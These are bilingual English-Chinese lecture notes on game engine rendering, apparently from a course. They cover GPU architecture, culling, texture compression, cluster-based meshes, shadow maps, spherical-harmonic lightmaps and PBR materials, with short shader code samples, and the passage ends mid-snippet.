    Rendering on Graphics Theory

    • Objects with one type of effect

      具有一种效果的对象

    • Focus on representation and math correctness

      注重表示和数学正确性

    • No strict performance requirement

      无严格的性能要求

      • Realtime (30 FPS) / interactive (10 FPS)

        实时 (30 FPS) / 交互式 (10 FPS)

        对于游戏来说,应保证游戏画面流畅

      • offline rendering

        离线渲染(无法实时渲染,如电影,海报等,画质好)

      • Out-of-core rendering

        核外渲染

    Challenges on Game Rendering (1/4)

    webp

    Tens of thousands of objects with dozens of types of effects

    ​数万个物体,数十种效果。容易跑不动。

    Challenges on Game Rendering (2/4)

    webp

    Deal with architecture of modern computer with a complex combination of CPU and GPU

    ​处理具有 CPU 和 GPU 复杂组合的现代计算机体系结构。(设计游戏引擎时,要考虑 CPU 和 GPU 的架构来写代码)

    Challenges on Game Rendering (3/4)

    webp

    Commit a bullet-proof framerate

    ​保证帧率

    • 30 FPS (60 FPS,120 FPS + VR)

    • 1080P, 4K and 8K resolution

    ​现在对游戏的分辨率和帧率要求越来越高了。

    Challenges on Game Rendering (4/4)

    • Limit access to CPU bandwidth and memory footprint

      限制对 CPU 带宽和内存占用的访问

    • Game logic, network, animation, physics and AI systems are major consumers of CPU and main memory

      游戏逻辑、网络、动画、物理和人工智能系统是 CPU 和主存的主要消耗者

    Rendering on Game Engine

    A heavily optimized practical software framework to fulfill the critical rendering requirements of games on modern hardware (PC, console and mobiles)

    ​高度优化的实用软件框架,可满足现代硬件(PC、游戏机和移动设备)上游戏的关键渲染要求

    Outline of Rendering

    ​本课程主要介绍的渲染技术,仅是蜻蜓点水,这玩意太复杂了。

    1. Basics of Game Rendering

      游戏渲染基础知识

      • Hardware architecture

        硬件架构

      • Render data organization

        渲染数据组织

      • Visibility

        能见度

    2. Materials, Shaders and Lighting

      材质、着色器和光照

      • PBR (SG, MR)

        PBR(SG、MR)

      • Shader permutation

        着色器排列

      • Lighting

        灯光

        • Point / Directional lighting

          点/定向照明

        • IBL / Simple GI

          IBL / 简单 GI

    3. Special Rendering

      特殊渲染

      • Terrain

        地形

      • Sky / Fog

        天空/雾

      • Postprocess

        后期处理

    4. Pipeline

      管道

      • Forward, deferred rendering, forward plus

        前向渲染、延迟渲染、Forward+

      • Real pipeline with mixed effects

        具有混合效果的真实管道

      • Ring buffer and V-Sync

        环形缓冲区和垂直同步

      • Tiled-based rendering

        基于平铺的渲染

    What Is Not Included

    • Cartoon Rendering

      卡通渲染(非真实渲染)

    • 2D Rendering Engine

      二维渲染引擎(三渲二)

    • Subsurface

      皮肤

    • Hair /Fur

      头发 / 皮毛

    Building Blocks of Rendering

    ​渲染的构建块

    Rendering Pipeline and Data

    ​渲染管道及数据

    webp

    ​图像的渲染过程。从 GAMES101 里搬来的图。

    Tens of millions of pixels, each with hundreds of ALU operations and dozens of texture samplings.

    ​数千万像素,数百个 ALU 和数十个纹理采样。

    Computation - Projection and Rasterization

    ​计算-投影和光栅化

    webp

    Computation - Shading

    ​计算-着色

    ​写的 Shader 在显卡中存储/计算。

    webp

    A shader sample code

    ​着色器示例代码

    • Constants /Parameters

      常量/参数

    • ALU algorithms

      ALU 算法

    • Texture Sampling

      纹理采样

    • Branches

      分支

    Computation - Texture Sampling

    ​计算-纹理采样

    webp

    • Step1

      Use two nearest mipmap levels

      使用两个最近的 mipmap 级别

    • Step2

      Perform bilinear interpolation in both mip-maps

      在两个 mip-map 中执行双线性插值

    • Step3

      Linearly interpolate between the results (a code sketch follows this list)

      在结果之间进行线性插值
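
    ​The three steps amount to the following minimal, self-contained sketch (a grayscale Mip type of my own, not a real GPU texture path):

    #include <algorithm>
    #include <vector>

    struct Mip { int width, height; std::vector<float> texels; };  // one mip level

    // Step 2 helper: bilinear interpolation inside a single mip level.
    static float SampleBilinear(const Mip& mip, float u, float v) {
        float x = u * (mip.width - 1), y = v * (mip.height - 1);
        int x0 = (int)x, y0 = (int)y;
        int x1 = std::min(x0 + 1, mip.width - 1), y1 = std::min(y0 + 1, mip.height - 1);
        float fx = x - x0, fy = y - y0;
        auto at = [&](int xi, int yi) { return mip.texels[yi * mip.width + xi]; };
        float top    = at(x0, y0) + fx * (at(x1, y0) - at(x0, y0));
        float bottom = at(x0, y1) + fx * (at(x1, y1) - at(x0, y1));
        return top + fy * (bottom - top);
    }

    // Steps 1 and 3: pick the two nearest mip levels, then lerp between them.
    float SampleTrilinear(const std::vector<Mip>& mips, float u, float v, float lod) {
        int mip0 = std::max(0, std::min((int)lod, (int)mips.size() - 1));
        int mip1 = std::min(mip0 + 1, (int)mips.size() - 1);
        float t = lod - (float)mip0;                 // blend factor between the levels
        float c0 = SampleBilinear(mips[mip0], u, v);
        float c1 = SampleBilinear(mips[mip1], u, v);
        return c0 + t * (c1 - c0);
    }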

    Understanding the Hardware

    ​即使是游戏开发者/技术美术工作人员,了解一下显卡的基本架构也是很有用的。

    GPU

    The dedicated hardware to solve massive jobs

    ​解决大量工作的专用硬件

    SIMD and SIMT

    webp

    SIMD (Single Instruction Multiple Data 单指令多数据)

    • Describes computers with multiple processing elements that perform the same operation on multiple data points simultaneously

      描述具有多个处理元件的计算机,这些元件同时对多个数据点执行相同的操作

    webp

    SIMT (Single Instruction Multiple Threads 单指令多线程)

    • An execution model used in parallel computing where single instruction, multiple data (SIMD) is combined with multithreading

      并行计算中使用的执行模型,其中单指令多数据(SIMD)与多线程相结合

    GPU Architecture

    webp

    GPC (Graphics Processing Cluster 图形处理集群)

    A dedicated hardware block for computing, rasterization, shadingand texturing

    ​用于计算、光栅化、着色和纹理的专用硬件块

    SM (Streaming Multiprocessor 流式多处理器)

    Part of the GPU that runs CUDA kernels

    ​运行 CUDA 内核的 GPU 的一部分

    Texture Units 纹理单位

    A texture processing unit, that can fetch and filter a texture

    ​纹理处理单元,可以获取和过滤纹理

    CUDA Core

    Parallel processors that allow data to be worked on simultaneously by different processors

    ​并行处理器允许不同处理器同时处理数据

    Warp

    A collection of threads

    ​线程的集合

    Data Flow from CPU to GPU

    webp

    • CPU and Main Memory

      CPU 和主内存

      • Data Load / Unload

        数据加载/卸载

      • Data Preparation

        数据准备

    • CPU to GPU

      • High Latency

        高延迟

      • Limited Bandwidth

        带宽有限

    • GPU and Video Memory

      GPU 和视频内存

      • High Performance Parallel Rendering

        高性能并行渲染

    Always minimize data transfer between CPU and GPU when possible

    ​尽可能减少 CPU 和 GPU 之间的数据传输

    Be Aware of Cache Efficiency

    webp

    ​Cache 比内存更快,尽量少做内存交换。

    webp

    • Take full advantage of hardware parallel computing

      充分利用硬件并行计算

    • Try to avoid the von Neumann bottleneck

      尽量避免冯诺依曼瓶颈

    GPU Bounds and Performance

    ​GPU 限制和性能

    Application performance is limited by:

    ​应用程序性能受到以下因素的限制:

    • Memory Bounds

      内存限制

    • ALU Bounds

      ALU 边界

    • TMU (Texture Mapping Unit) Bound

      TMU(纹理映射单元)绑定

    • BW (Bandwidth) Bound

      BW(带宽)限制

    Modern Hardware Pipeline

    webp

    • Direct3D 12graphics pipeline

      Direct3D 12 图形管道

    • Mesh and amplification shaders

      网格和放大着色器

    • Direct3D 12 compute pipeline

      Direct3D 12 计算管道

    Other State-of-Art Architectures

    ​其他最先进的架构

    webp

    GPU:

    1.825 GHz, 52 CUs, 12 TFLOPS FP32, 3328 streaming processors

    DRAM:

    16 GB GDDR6, 10GB high memory interleave + 6GB low memory interleave

    20 channels of x16 GDDR6 @ 14 Gbps -> 560 GB/s

    CPU:

    8x Zen 2 CPU cores @ 3.8 GHz (3.6 GHz w/ SMT), 32 KB L1 I$, 32 KB L1 D$, 512 KB L2 per CPU core

    webp

    Renderable

    Mesh Render Component

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    Building Blocks of Renderable

    ​可渲染的构建块

    webp

    Mesh Primitive

    ​网格基元

    webp

    Vertex and Index Buffer

    ​顶点和索引缓冲区

    webp

    • Vertex Data

      顶点数据

      • Vertex declaration

        顶点声明

      • Vertex buffer

        顶点缓冲区

    • Index Data

      索引数据

      • Index declaration

        索引声明

      • Index buffer

        索引缓冲区

    Why We Need Per-Vertex Normal

    webp

    ​为什么我们需要顶点法线?如果根据面法线计算的话,对于转角处,顶点法线方向可能会有歧义。

    Materials

    webp

    Determine the appearance of objects, and how objects interact with light

    ​确定物体的外观以及物体如何与光相互作用

    Famous Material Models

    webp

    Phong Model

    PBR Model - Physically based rendering 基于物理的渲染

    Subsurface Material - Burley SubSurface Profile 渲染皮肤

    Various Textures in Materials

    webp

    Variety of Shaders

    webp

    Render Objects in Engine

    Coordinate System and Transformation

    ​坐标系和变换

    webp

    Model assets are made based on local coordinate systems, and eventually we need to render them into screen space

    ​模型资源是基于局部坐标系制作的,最终我们需要将它们渲染到屏幕空间中

    Object with Many Materials

    webp

    ​如果一个对象仅使用一个材质,渲染出的效果可能不够真实。

    How to Display Different Textures on a Single Model

    webp

    ​将 Object 模型分为多个 Submesh,每个 Submesh 使用不同的 Material。

    webp

    ​如果每个 Submesh 都占据显存的空间,会导致浪费。

    Resource Pool

    webp

    ​使用一个资源池,加强资源的复用。

    Instance: Use Handle to Reuse Resources

    ​实例:使用句柄重用资源

    webp

    Sort by Material

    webp

    GPU Batch Rendering

    webp

    ​GPU Batch Rendering 是一种图形渲染技术,它利用计算机的 GPU(Graphics Processing Unit)来加速图形渲染过程。在传统的图形渲染中,每个物体都需要单独渲染,这会导致大量的数据传输和渲染时的负载,降低了渲染效率。

    ​而 GPU Batch Rendering 则可以将多个物体合并成一个批次(Batch),同时进行渲染。这种方式可以减少数据传输,提高渲染效率,特别是在大规模场景和复杂模型的情况下,可以极大地提高渲染速度。

    Q: What if we group and render all instances with identical submeshes and materials together?

    ​问:如果将具有相同子网格和材质的所有实例分组渲染在一起会怎样?

    Visibility Culling

    ​可见性剔除

    Culling One Object

    webp

    View Frustum

    ​视锥体

    Soldier Bounding Box

    ​士兵边界框

    Using the Simplest Bound to Create Culling

    ​使用最简单的绑定来创建剔除

    webp

    • Inexpensive intersection tests

      廉价的交叉测试

    • Tight fitting

      紧密贴合

    • Inexpensive to compute

      计算成本低廉

    • Easy to rotate and transform

      易于旋转和变换

    • Use little memory (a code sketch follows this list)

      使用很少的内存
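
    ​For an axis-aligned bounding box, the frustum test reduces to six plane checks, as in this minimal sketch (the plane convention is my own: inward-facing normals):

    struct Plane { float nx, ny, nz, d; };  // n . p + d >= 0 means "inside"
    struct AABB  { float minX, minY, minZ, maxX, maxY, maxZ; };

    bool IsVisible(const AABB& box, const Plane planes[6]) {
        for (int i = 0; i < 6; ++i) {
            const Plane& p = planes[i];
            // Pick the box corner farthest along the plane normal ("positive vertex").
            float x = (p.nx >= 0.0f) ? box.maxX : box.minX;
            float y = (p.ny >= 0.0f) ? box.maxY : box.minY;
            float z = (p.nz >= 0.0f) ? box.maxZ : box.minZ;
            if (p.nx * x + p.ny * y + p.nz * z + p.d < 0.0f)
                return false;               // entirely outside this plane -> culled
        }
        return true;                        // inside or intersecting the frustum
    }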

    Hierarchical View Frustum Culling

    webp

    ​使用 Quad Tree Culling 和 BVH 等,排除不可见对象

    Construction and insertion of BVH in Game Engine

    ​游戏引擎中 BVH 的构建和插入

    webp

    PVS (Potential Visibility Set)

    ​PVS(潜在可见性集)

    webp

    ​PVS(Potentially Visible Set)是一种基于空间划分的可视性剔除算法,用于在三维场景中快速确定观察点能够看到哪些物体。

    ​PVS 算法的基本思想是将场景分割成多个相邻的小区域(如八叉树等),然后对每个小区域计算其与其他小区域的可见性关系,即确定一个小区域可以直接看到哪些相邻的小区域,这些可见的小区域组成了该小区域的 PVS 集合。

    ​当观察点移动时,只需要判断当前观察点所处的小区域的 PVS 集合中是否包含其他小区域,从而确定哪些物体需要被渲染。这种方法可以大大减少需要渲染的物体数量,提高渲染效率。

    ​PVS 算法还可以通过优化 PVS 集合的计算和存储方式,以及合并相邻小区域的 PVS 集合等手段进一步提高效率。但是,由于 PVS 算法依赖于场景的空间划分,因此对于具有复杂几何形状或存在大量遮挡物的场景,该算法可能会带来较大的计算负担。

    Portal and PVS Data

    webp

    Determine potentially visible leaf nodes immediately from portal

    ​立即从门户确定潜在可见的叶节点

    The Idea of Using PVS in Stand-alone Games

    ​单机游戏中 PVS 的使用思路

    webp

    Green box:

    The area to determine the potential visibility where you need

    ​确定您需要的潜在可见度的区域

    Blue cells:

    Auto generated smaller regions of each green box.

    ​自动生成每个绿色框的较小区域。

    Pros 优点

    • Much faster than BSP/Octree

      比 BSP/八叉树快得多

    • More flexible and compatible

      更灵活、更兼容

    • Preload resources by PVS

      通过 PVS 预加载资源

    GPU Culling

    webp

    ​先不渲染材质,根据深度信息排除掉不可见部分后再渲染。

    Texture Compression

    ​纹理压缩

    A must-know for game engine

    ​游戏引擎必须了解的知识

    Texture Compression

    webp

    • Traditional image compression like JPG and PNG

      传统图像压缩,如 JPG 和 PNG

      • Good compression rates

        良好的压缩率

      • Image quality

        图像质量

      • Designed to compress or decompress an entire image

        设计用于压缩或解压缩整个图像

    • In game texture compression

      游戏中的纹理压缩

      • Decoding speed

        解码速度

      • Random access

        随机访问(传统图像压缩无法做到随机访问,即快速获取某个坐标的颜色值)

      • Compression rate and visual quality

        压缩率和视觉质量

      • Encoding speed

        编码速度

    Block Compression

    webp

    Common block-based compression format

    ​常见的基于块的压缩格式

    • On PC, BC7 (modern) or DXTC (old) formats

      在 PC 上,BC7(现代)或 DXTC(旧)格式

    • On mobile, ASTC (modern) or ETC / PVRTC (old) formats

      在移动设备上,ASTC(现代)或 ETC / PVRTC(旧)格式

    Authoring Tools of Modeling

    ​建模创作工具

    Modeling - Polymodeling

    webp

    ​使用基于多边形建模的软件。

    Modeling - Sculpting

    webp

    ​ZBrush 提供了一种新的建模概念——雕刻。

    Modeling - Scanning

    webp

    ​使用扫描仪建模。

    Modeling - Procedural Modeling

    webp

    ​程序化建模。

    Comparison of Authoring Methods

    ​创作方法比较

                   Polymodeling     Sculpting             Scanning              Procedural modeling
    Advantage      Flexible         Creative              Realistic             Intelligent
    Disadvantage   Heavy workload   Large volume of data  Large volume of data  Hard to achieve

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    Sculpting Tools Create Infinite Details

    webp

    ​雕刻工具创造无限细节

    • Artists create models with infinite details

      艺术家创造具有无限细节的模型

    • From linear fps to open world fps, complex scenes submit 10x more triangles to the GPU per frame

      从线性 FPS 到开放世界 FPS,复杂场景每帧向 GPU 提交 10 倍以上的三角形

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    webp

    GPU-Driven Rendering Pipeline (2015) GPU 驱动的渲染管道 (2015)

    • Mesh Cluster Rendering

      网格簇渲染

      • Arbitrary number of meshes in single drawcall

        单次绘制中任意数量的网格

      • GPU-culled by cluster bounds

        按集群边界进行 GPU 剔除,一个对象中的不可见部分就不渲染了

      • Cluster depth sorting

        聚类深度排序

    Geometry Rendering Pipeline Architecture (2021) 几何渲染管线架构(2021)

    • Rendering primitives are divided as:

      渲染基元分为:

      • Batch: a single API draw (drawIndirect / drawIndexIndirect), composed of many Surfs

        Batch:单个 API 绘制(drawIndirect / drawIndexIndirect),由许多 Surf 组成

      • Surf: submeshes based on materials, composed of many Clusters

        Surf:基于材质的子网格,由许多簇组成

      • Cluster: 64 triangles strip

        Cluster:由 64 个三角形组成的条带

    Programmable Mesh Pipeline

    webp

    GPU Culling in Cluster-Based Mesh

    ​基于集群的网格中的 GPU 剔除

    webp

    ​背面的 cluster 就看不见了。

    Nanite

    • Hierarchical LOD clusters with seamless boundary

      具有无缝边界的分层 LOD 集群

    • Don’t need hardware support, but using a hierarchical cluster culling on the precomputed BVH tree by persistent threads (CS) on GPU instead of task shader

      不需要硬件支持,但通过 GPU 上的持久线程(CS)而不是任务着色器对预先计算的 BVH 树使用分层集群剔除

    Take Away

    1. The design of game engine is deeply related to the hardware architecture design

      游戏引擎的设计与硬件架构设计有很深的关系

    2. A submesh design is used to support a model with multiple materials

      采用子网格设计来支持多种材质的模型

    3. Use culling algorithms to draw as few objects as possible

      使用剔除算法绘制尽可能少的对象

    4. As GPUs become more powerful, more and more work is moved onto the GPU, which is called GPU Driven

      随着 GPU 越来越强大,越来越多的工作被转移到 GPU 上,这就是 GPU Driven(GPU 驱动)

    第五节:渲染中光和材质的数学魔法

    Rendering on Game Engine

    Lighting, Materials and Shaders

    Participants of Rendering Computation

    ​渲染计算参与者

    • Lighting

      灯光

      • Photon emit, bounce, absorb and perception is the origin of everything in rendering

        光子的发射、反弹、吸收和感知是渲染中一切的起源

    • Material

      材料

      • How matter react to photon

        物质如何对光子做出反应

    • Shader

      着色器

      • How to train and organize those micro-slaves to finish such a vast and dirty computation job between photon and materials

        如何训练和组织这些微型奴隶来完成光子和材料之间如此庞大而肮脏的计算工作

    An interesting adventure story joined by smart graphics scientists and engineers based on evolution of hardware.

    ​一段由聪明的图形科学家和工程师们伴随硬件演进共同谱写的有趣冒险故事。

    The Rendering Equation

    ​James Kajiya 在 1986 年的 SIGGRAPH 提出了渲染方程:

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    出射 outgoing = 自发光 emitted + 反射光 reflected

    ​Radiance(辐亮度)指的是给定方向上、单位立体角、单位投影面积上的能量辐射量。它表示了光线从光源或物体表面出射的能量。Radiance 与发射光线的方向、面积以及能量有关,通常用符号 L 表示,单位为 $W/(sr\cdot m^2)$(瓦特/(球面度·平方米))。

    ​Irradiance(辐照度)指的是单位面积上受到的来自各个方向的光能量的总和。它表示了光线对物体表面的照射强度。Irradiance 与入射光线的方向、面积以及能量有关,通常用符号 E 表示,单位为 $W/m^2$(瓦特/平方米)。

    webp

    ​虽然这个方程很早就被提出,但是想要正确又高效地计算这个方程太困难了。

    webp

    Complexity of Real Rendering

    webp

    ​现实生活中的光太复杂了。

    • Indirect light

      间接光

    • Indirect shadow

      间接阴影

    • Direct light

      直射光

    • Scattering

      散射

    • Caustics

      焦散

    • Glossy reflections

      光泽反射

    The 1st Challenge: 1a Visibility to Lights

    webp

    ​第一个挑战(1a):判断光源对着色点是否可见

    The 1st Challenge: 1b Light Source Complexity

    webp

    ​第一个挑战(1b):光源种类复杂

    The 2nd Challenge: How to do Integral Efficiently on Hardware

    ​第二个挑战:如何在硬件上高效地进行积分

    webp

    • Brute-force way sampling

      暴力方式采样

    • Smarter sampling, i.e., Monte Carlo

      更智能的采样,如蒙特卡罗方法

    • Derive fast analytical solutions

      得出快速分析解决方案

      • Simplify the $f_r$ :

        简化 $f_r$:

        • Assumptions about the optical properties of materials

          对材料的光学特性做假设

        • Mathematical representation of materials

          材料的数学表示

      • Simplify the $L_i$ :

        简化$L_i$:

        • Deal with directional light, point light and spot light only

          仅处理定向光、点光和聚光灯

        • A mathematical representation of incident light sampling on a hemisphere, for example: IBL and SH

          半球上入射光采样的数学表示,例如:IBL 和 SH

    The 3rd Challenge: Any matter will be light source

    ​挑战之三:任何物质都可以成为光源(会反射光)

    webp

    Starting from Simple

    Forget some abstract concepts for a while, i.e. radiosity, microfacet and BRDF etc.

    ​暂时忘记一些抽象概念,如光能传递(radiosity)、微表面(microfacet)和 BRDF 等

    Simple Light Solution

    webp

    glLightfv(GL_LIGHT0, GL_AMBIENT, light_ambient);
    glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse);
    glLightfv(GL_LIGHT0, GL_SPECULAR, light_specular);
    glLightfv(GL_LIGHT0, GL_POSITION, light_position);
    • Using simple light source as main light

      使用简单光源作为主光

      • Directional light in most cases

        大多数情况下是定向光

      • Point and spot light in special case

        特殊情况下的点光源和聚光灯

    • Using ambient light to hack others

      用环境光近似(hack)其余所有光照

      • A constant to represent mean of complex hemisphere irradiance

        用一个常数表示复杂半球辐照度的平均值

    • Supported in graphics API

      图形 API 原生支持

    Environment Map Reflection

    webp

    • Using environment map to enhance glossy surface reflection

      使用环境贴图增强光泽(glossy)表面的反射

    • Using environment mipmap to represent roughness of surface

      使用环境 mipmap 来表示表面的粗糙度

    void main()
    {
        vec3 N = normalize(normal);
        vec3 V = normalize(camera_position - world_position);
        vec3 R = reflect(-V, N); // reflect 的入射向量指向表面,故取 -V
        FragColor = texture(cube_texture, R);
    }

    Early stage exploration of image-based lighting

    ​基于图像的照明的早期探索

    Math Behind Light Combo

    ​光组合背后的数学

    webp

    • Main Light

      主光源

      • Dominant Light

        主光源

    • Ambient Light

      环境光

      • Low-frequency of irradiance sphere distribution

        低频辐照度球体分布

    • Environment Map

      环境贴图

      • High-frequency of irradiance sphere distribution

        高频辐照度球体分布

    Blinn-Phong Materials

    webp

    ​Blinn-Phong 光照模型是个很经典的光照模型,虽然现在有点过时了。
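
    ​它的核心只有漫反射与半程向量高光两项(GLSL 示意,参数命名为假设):

    // 经典 Blinn-Phong:漫反射 + 半程向量高光
    vec3 blinnPhong(vec3 N, vec3 V, vec3 L, vec3 lightColor, vec3 kd, vec3 ks, float shininess)
    {
        vec3 H = normalize(L + V);                        // 半程向量
        float diff = max(dot(N, L), 0.0);                 // 漫反射项
        float spec = pow(max(dot(N, H), 0.0), shininess); // 高光项
        return lightColor * (kd * diff + ks * spec);
    }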

    Problem of Blinn-Phong

    • Not energy conservative

      不符合能量守恒定律(可能越反射越亮)

      • Unstable in ray-tracing

        光线追踪不稳定

    webp

    Left: non-energy-conserving model leads to a lot of noise compared with the right energy-conserving model

    ​不满足能量守恒的模型(左)与满足能量守恒的模型(右)相比,会产生大量噪点

    • Hard to model complex realistic material

      难以模拟复杂的真实材质(Blinn-Phong 模拟出来的材质都有一股塑料感)

    webp

    Shadow

    webp

    • Shadow is nothing but space when the light is blocked by an opaque object

      当光线被不透明物体挡住时,阴影不过是留下的那片无光区域

    • Already obsolete method

      已经过时的方法

      • planar shadow

        平面阴影

      • shadow volume

        阴影体积

      • projective texture

        投影纹理

    Shadow Map

    ​Shadow Map 是计算机图形学中用于实现阴影的一种技术。它基于光线追踪的概念,将场景从光源的视角渲染到一个深度纹理贴图上,以便在后续的渲染中使用这个纹理来确定哪些表面处于阴影之中。

    ​计算出阴影贴图。用一张 texture 表示阴影。

    webp

    // project our 3D position to the shadow map
    vec4 proj_pos = shadow_viewproj * pos;
    // from homogeneous space to clip space
    vec2 shadow_uv = proj_pos.xy / proj_pos.w;
    // from clip space to uv space
    shadow_uv = shadow_uv * 0.5 + vec2(0.5);
    // get point depth (from -1 to 1)
    float real_depth = proj_pos.z / proj_pos.w;
    // normalize from [-1..+1] to [0..+1]
    real_depth = real_depth * 0.5 + 0.5;
    // read depth from depth buffer in [0..+1]
    float shadow_depth = texture(shadowmap, shadow_uv).x;
    // compute final shadow factor by comparing
    float shadow_factor = 1.0;
    if (shadow_depth < real_depth)
        shadow_factor = 0.0;

    Problem of Shadow Map

    webp

    Resolution is limited on texture

    ​分辨率受纹理限制

    webp

    Depth precision is limited in texture

    ​深度精度受到纹理的限制

    Basic Shading Solution

    • Simple light + Ambient

      简单光 + 环境光

      • dominant light solves No. 1b challenge

        主光源解决了第 1b 项挑战

      • ambient and EnvMap solve No. 3 challenge

        环境光和 EnvMap 解决了第 3 项挑战

    • Blinn-Phong material

      • solves No. 2 challenge

        解决第 2 项挑战

    • Shadow map

      阴影贴图

      • solves No. 1a challenge

        解决第 1a 项挑战

    Cheap, Robust and Easy Modification

    ​便宜、鲁棒且易于修改

    First Wave of AAA Quality

    ​3A 游戏的渲染技术不断发展。

    Pre-computed Global Illumination

    ​预计算全局光照:离线把间接光烘焙好存储起来,运行时直接读取,以较小的代价获得比单一环境光常量精细得多的效果。

    Why Global Illumination is Important

    webp

    ​如果不考虑光的反射,大片面积将会一坨黑。

    How to Represent indirect Light

    webp

    • Good compression rate

      良好的压缩率

      • We need to store millions of radiance probes in a level

        我们需要在一个关卡(level)中存储数百万个辐射度探针

    • Easy to do integration with material function

      易于与材质函数做积分

      • Use polynomial calculation to convolve with material BRDF

        使用多项式计算与材质 BRDF 进行卷积

    ​计算光照用到了下面数学工具:

    Fourier Transform

    webp

    $$f(t)=\frac{A}{2}+\frac{2A\cos(t\omega)}{\pi}-\frac{2A\cos(3t\omega)}{3\pi}+\frac{2A\cos(5t\omega)}{5\pi}-\frac{2A\cos(7t\omega)}{7\pi}+\cdots $$

    ​傅里叶变换让函数在时域/空域与频域之间相互转换。

    Convolution Theorem

    webp

    ​引入傅里叶变换,让卷积速度更快!

    Spherical Harmonics

    ​球谐函数

    ​Spherical Harmonics(球谐函数)是一组用于描述球面上函数的数学函数系列。在计算机图形学中,球谐函数被广泛应用于光照和环境光的表示与计算。

    webp

    webp

    Spherical Harmonics, a mathematical system analogous to the Fourier transform but defined across the surface of a sphere. The SH functions in general are defined on imaginary numbers

    ​球谐函数是一套类似于傅里叶变换、但定义在球面上的数学系统。一般形式的 SH 函数定义在复数域上

    Spherical Harmonics Encoding

    webp

    Sampling Irradiance Probe Anywhere

    webp

    Compress Irradiance Probe to SH1

    ​Irradiance Probe(辐照度探针)是计算机图形学中用于捕捉和近似表示环境光照信息的技术。它通过在场景中放置一系列探针来采样场景中的辐照度(irradiance),并将这些采样结果存储起来,以便在渲染过程中使用。

    webp

    • Source Irradiance Probe

      原始辐照度探针

    • Compressed Irradiance Probe by SH1

      用 SH1 压缩后的辐照度探针

    • Reconstruct Irradiance in Shader

      在着色器中重建辐照度

    Store and Shading with SH

    Just RGBA8 color

    • Use 4 RGB textures to store 12 SH coefficients

      使用 4 个 RGB 纹理来存储 12 个 SH 系数

      • $L0$ coefficients in HDR (BC6H texture)

        HDR 中的 $L0$ 系数(BC6H 纹理)

      • $L1$ coefficients in LDR (3x BC7 or BC1 textures)

        LDR 中的 $L1$ 系数(3 张 BC7 或 BC1 纹理)

    • Total footprint for RGB SH lightmaps:

      RGB SH 光照贴图的总占用空间:

      • 32 bits (4 bytes)/texel for BC6+BC7, high quality mode

        BC6+BC7:每纹素 32 位(4 字节),高质量模式

      • 20 bits (2.5 bytes)/texel for BC6+BC1, low quality mode

        BC6+BC1:每纹素 20 位(2.5 字节),低质量模式(用这些系数重建辐照度的示意见下)
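
    ​着色时的重建只是一次 SH 基函数求值(GLSL 示意;基函数常数为标准值,变量命名为假设):

    // 用 L0 + L1 共 4 组 RGB 系数,沿法线方向 N 重建辐照度
    vec3 evalIrradianceSH1(vec3 shL0, vec3 shL1x, vec3 shL1y, vec3 shL1z, vec3 N)
    {
        // 基函数常数:Y0 = 0.282095,Y1 = 0.488603 * (x|y|z)
        return shL0  * 0.282095
             + shL1x * 0.488603 * N.x
             + shL1y * 0.488603 * N.y
             + shL1z * 0.488603 * N.z;
    }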

    Simple diffuse shading

    webp

    SH Lightmap: Precomputed GI

    ​SH 光照贴图:预计算 GI

    ​空间换时间。

    ​SH Lightmap 是一种基于球谐函数(Spherical Harmonics)的光照贴图技术,可以用于近似表示场景中的光照信息。它通过将场景的光照信息转换为球谐系数并存储到贴图上,以便在渲染时快速计算每个片元的光照贡献。

    webp

    • Parameterized all scene into huge 2D lightmap atlas

      将所有场景参数化为巨大的 2D 光照图集

    • Using offline lighting farm to calculate irradiance probes for all surface points

      使用离线光照烘焙集群(lighting farm)计算所有表面点的辐照度探针

    • Compress those irradiance probes into SH coefficients

      将这些辐照度探针压缩为 SH 系数

    • Store SH coefficients into 2D atlas lightmap textures

      将 SH 系数存储到 2D 图集光照贴图纹理中

    Lightmap: UV Atlas

    webp

    Lightmap density

    ​光照贴图密度

    • Low-poly proxy geometry

      低多边形代理几何体

    • Fewer UV charts/islands

      更少的 UV 分块/孤岛(charts/islands)

    • Fewer lightmap texels are wasted

      浪费的光照贴图纹理像素更少

    Lightmap: Lighting

    webp

    Indirect lighting, final geometry

    ​间接光照,最终几何体

    • Project lightmap from proxies to all LODs

      将光照贴图从代理几何体投影到所有 LOD

    • Apply mesh details

      应用网格细节

    • Add short-range, high-frequency lighting detail by HBAO

      通过 HBAO 添加短距离、高频照明细节

    Lightmap: Lighting + Direct Lighting

    webp

    ​光照贴图:光照+直接光照

    Direct + indirect lighting, final geometry

    ​直接+间接照明,最终几何形状

    • Compute direct lighting dynamically

      动态计算直接照明

    Final Shading with Materials

    webp

    Final frame

    ​最终帧

    • Combined with materials

      与材质结合

    Lightmap

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Bake a lot of fine details of GI on environment

        把环境中 GI 的很多精细细节烘焙了下来

    • Cons

      缺点

      • Long and expensive precomputation (lightmap farm)

        漫长而昂贵的预计算(光照贴图农场)

      • Only can handle static scene and static light

        只能处理静态场景和静态灯光

      • Storage cost on package and GPU

        包和 GPU 的存储成本

    Light Probe: Probes in Game Space

    webp

    Light Probe Point Generation

    webp

    Reflection Probe

    webp

    Light Probes + Reflection Probes

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Can be applied to both static and dynamic objects

        可应用于静态和动态对象

      • Handle both diffuse and specular shading

        处理漫反射和镜面反射着色

    • Cons

      缺点

      • A bunch of SH light probes need some precomputation

        一堆 SH 光探头需要一些预计算

      • Can not handle fine detail of GI, i.e., soft shadow on overlapped structures

        无法处理 GI 的精细细节,例如重叠结构上的软阴影

    Physical-Based Material

    Microfacet Theory

    ​微平面理论。

    webp

    BRDF Model Based on Microfacet

    ​基于 Microfacet 的 BRDF 模型

    webp

    Normal Distribution Function

    webp

    $$f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}$$

    $$NDF_{GGX}(n,h,\alpha)=\frac{\alpha^{2}}{\pi\left((n\cdot h)^{2}(\alpha^{2}-1)+1\right)^{2}}$$
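
    ​上面的 GGX 法线分布函数几乎可以逐字翻译成代码:

    // GGX/Trowbridge-Reitz 法线分布函数,对应上式
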